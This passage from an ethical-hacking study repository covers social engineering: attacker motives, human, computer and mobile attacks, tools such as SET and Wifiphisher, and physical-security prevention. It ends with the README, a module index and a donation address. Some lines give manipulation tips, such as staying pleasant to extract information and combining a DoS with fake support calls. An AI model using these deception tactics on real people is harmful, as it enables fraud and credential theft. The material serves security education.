integrity 32 | 33 | ## **Behaviors** 34 | - **Human nature/Trust** - trusting others 35 | - **Ignorance** of social engineering efforts 36 | - **Fear** of consequences of not providing the information 37 | - **Greed** - promised gain for providing requested information 38 | - A sense of **moral obligation** 39 | 40 | ## **Companies Common Risks:** 41 | - **Insufficient training** 42 | - **Lack of controls** 43 | - Technical 44 | - e.g: Firewall rule, ACL rules, patch management (...) 45 | - Administrative 46 | - e.g: Mandatory Vacations, Job Rotation, Separation of Duties (...) 47 | - Physical 48 | - e.g: Proper Lighting, Cameras, Guards, Mantraps (...) 49 | - **Size of the Company Matters** 50 | - **Lack of Policies** 51 | - Promiscuous Policy 52 | - Permisive Policy 53 | - Prudent Policy 54 | - Paranoid Policy 55 | 56 | ## Social Engineering Attacks: 57 | 58 | ## Human-Based Attacks 👥 59 | 60 | - **Dumpster Diving** - Looking for sensitive information in the trash 61 | - Shredded papers can sometimes indicate sensitive info 62 | 63 | - **Impersonation** - Pretending to be someone you're not 64 | - Can be anything from a help desk person up to an authoritative figure (FBI agent) 65 | - Posing as a tech support professional can really quickly gain trust with a person 66 | 67 | - **Shoulder Surfing** - Looking over someone's shoulder to get info 68 | - Can be done long distance with binoculars, etc. 69 | 70 | - **Eavesdropping** - Listening in on conversations about sensitive information 71 | 72 | - **Tailgating** - Attacker walks in behind someone who has a valid badge. (e.g: Holding boxes or simply by following without getting notice) 73 | 74 | - **Piggybacking** - Attacker pretends they lost their badge and asks someone to hold the door 75 | 76 | - **RFID Identity Theft** (RFID skimming) - Stealing an RFID card signature with a specialized device 77 | 78 | - **Reverse Social Engineering** - Getting someone to call you and give information 79 | - Often happens with tech support - an email is sent to user stating they need them to call back (due to technical issue) and the user calls back 80 | - Can also be combined with a DoS attack to cause a problem that the user would need to call about 81 | - Always be pleasant - it gets more information 82 | 83 | - **Insider Attack** - An attack from an employee, generally disgruntled 84 | - Sometimes subclassified (negligent insider, professional insider) 85 | 86 | ## Computer-Based Attacks 💻 87 | *Can begin with sites like Facebook where information about a person is available; For instance - if you know Bob is working on a project, an email crafted to him about that project would seem quite normal if you spoof it from a person on his project.* 88 | 89 | - **Phishing** - crafting an email that appears legitimate but contains links to fake websites or to download malicious content. 90 | 91 | - **Ways to Avoid Phishing** 92 | - Beware unknown, unexpected or suspicious originators 93 | - Beware of who the email is addressed to 94 | - Verify phone numbers 95 | - Beware bad spelling or grammar 96 | - Always check links 97 | 98 | - **Spear Phishing** - Targeting a person or a group with a phishing attack. 99 | - Can be more useful because attack can be targeted 100 | 101 | - **Whaling** - Going after **CEOs** or other **C-level executives**. 102 | 103 | - **Pharming** - Make a user's traffic redirects to a clone website; may use DNS poisoning. 104 | 105 | - **Spamming** - Sending spam over instant message. 106 | 107 | - **Fake Antivirus** - Very prevalent attack; pretends to be an anti-virus but is a malicious tool. 108 | 109 | ### **Tools** 110 | - **SET (Social Engineering Toolkit)** - Pentest tool design to perform advanced attacks against human by exploiting their behavior. 111 | 112 | - **PhishTank** - For phishing detection 113 | 114 | - **Wifiphisher** - Automated phishing attacks against Wi-Fi networks in order to obtain credentials or inject malware. 115 | 116 | - **SPF SpeedPhish framework** - Quick recon and deployment of simple social eng. exercises 117 | 118 | ## Mobile-Based Attacks 119 | 120 | - **ZitMo** (ZeuS-in-the-Mobile) - banking malware that was ported to Android 121 | - SMS messages can be sent to request premium services 122 | - **Attacks** 123 | - Publishing malicious apps 124 | - Repackaging legitimate apps 125 | - Fake security applications 126 | - SMS (**smishing**) 127 | 128 | ## Physical Security Basics 129 | 130 | - **Physical measures** - everything you can touch, taste, smell or get shocked by 131 | - Includes things like air quality, power concerns, humidity-control systems 132 | - **Technical measures** - smartcards and biometrics 133 | - **Operational measures** - policies and procedures you set up to enforce a security-minded operation 134 | - **Access controls** - physical measures designed to prevent access to controlled areas 135 | - **Biometrics** - measures taken for authentication that come from the "something you are" concept 136 | - **False rejection rate** (FRR) - when a biometric rejects a valid user 137 | - **False acceptance rate** (FAR) - when a biometric accepts an invalid user 138 | - **Crossover error rate** (CER) - combination of the two; determines how good a system is 139 | - Even though hackers normally don't worry about environmental disasters, this is something to think of from a pen test standpoint (hurricanes, tornadoes, floods, etc.) 140 | 141 | ## Prevention 142 | - Separation of duties 143 | - Rotation of duties 144 | - Controlled Access 145 | - Least privilege 146 | - Logging & Auditing 147 | - Policies 148 | 149 | 150 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |

3 | 4 |

5 | 6 |

HACKING GUIDE

7 |

HACKING GUIDE is a collection of hacking guide books.

8 | 9 | ### DESCRIPTION 10 | HACKING GUIDE is a comprehensive resource for aspiring ethical hackers, providing step-by-step tutorials and tools to enhance cybersecurity knowledge. This guide equips users with essential skills to understand and mitigate potential security risks. HACKING GUIDE covers various aspects of ethical hacking, including penetration testing, vulnerability analysis, and network security. Users can explore practical demonstrations and gain insights into the latest cybersecurity techniques. It's important to note that HACKING GUIDE is designed for educational purposes, promoting ethical hacking practices and adhering to strict ethical standards. The guide emphasizes responsible and legal use of hacking knowledge to strengthen digital defenses and protect against potential threats. 11 | 12 | 1. [Module 01 - Introduction to Ethical Hacking](https://github.com/0xbitx/Hacking-guide/blob/master/1-Introduction.md) 13 | 2. [Module 02 - Footprinting and Reconnaissance](https://github.com/0xbitx/Hacking-guide/blob/master/2-Footprinting-and-Reconnaissance.md) 14 | 3. [Module 03 - Scanning Networks](https://github.com/0xbitx/Hacking-guide/blob/master/3-Scanning-Networks.md) 15 | 4. [Module 04 - Enumeration](https://github.com/0xbitx/Hacking-guide/blob/master/2-Scanning-and-Enumeration.md) 16 | 5. [Module 05 - Vulnerability Analysis](https://github.com/0xbitx/Hacking-guide/blob/main/5-Vulnerability-Analysis.md) 17 | 6. [Module 06 - System Hacking](https://github.com/0xbitx/Hacking-guide/blob/master/6-System-Hacking.md) 18 | 7. [Module 07 - Malware Threats](https://github.com/0xbitx/Hacking-guide/blob/master/7-Malware.md) 19 | 8. [Module 08 - Sniffing](https://github.com/0xbitx/Hacking-guide/blob/master/8-Sniffing.md) 20 | 9. [Module 09 - Social Engineering](https://github.com/0xbitx/Hacking-guide/blob/master/9-Social-Engineering.md) 21 | 10. [Module 10 - Denial of Service](https://github.com/0xbitx/Hacking-guide/blob/master/10-Denial-of-Service.md) 22 | 11. [Module 11 - Session Hijacking](https://github.com/0xbitx/Hacking-guide/blob/master/11-Session-Hijacking.md) 23 | 12. [Module 12 - Evading IDS, Firewalls, and Honeypots](https://github.com/0xbitx/Hacking-guide/blob/master/12-Evading-IDS-Firewalls-and-Honeypots.md) 24 | 13. [Module 13 - Hacking Web Servers](https://github.com/0xbitx/Hacking-guide/blob/master/13-Hacking-Web-Servers.md) 25 | 14. [Module 14 - Hacking Web Applications](https://github.com/0xbitx/Hacking-guide/blob/master/14-Hacking-Web-Applications.md) 26 | 15. [Module 15 - SQL Injection](https://github.com/0xbitx/Hacking-guide/blob/master/14-Pentesting.md) 27 | 16. [Module 16 - Hacking Wireless Networks](https://github.com/0xbitx/Hacking-guide/blob/master/16-Hacking-Wireless-Networks.md) 28 | 17. [Module 17 - Hacking Mobile Platforms](https://github.com/0xbitx/Hacking-guide/blob/master/17-Hacking-Mobile-Platforms-and-IoT.md) 29 | 18. [Module 18 - Hacking IoT and OT Hacking](https://github.com/0xbitx/Hacking-guide/blob/master/17-Hacking-Mobile-Platforms-and-IoT.md) 30 | 19. [Module 19 - Cloud Computing](https://github.com/0xbitx/Hacking-guide/blob/master/19-Cloud%20Computing.md) 31 | 20. [Module 20 - Cryptography](https://github.com/0xbitx/Hacking-guide/blob/master/20-Cryptography.md) 32 | 33 | 34 | ## Support 35 | 36 | If you find my work helpful and want to support me, consider making a donation. Your contribution will help me continue working on open-source projects. 37 | 38 | **Bitcoin Address: `36ALguYpTgFF3RztL4h2uFb3cRMzQALAcm`** 39 | --------------------------------------------------------------------------------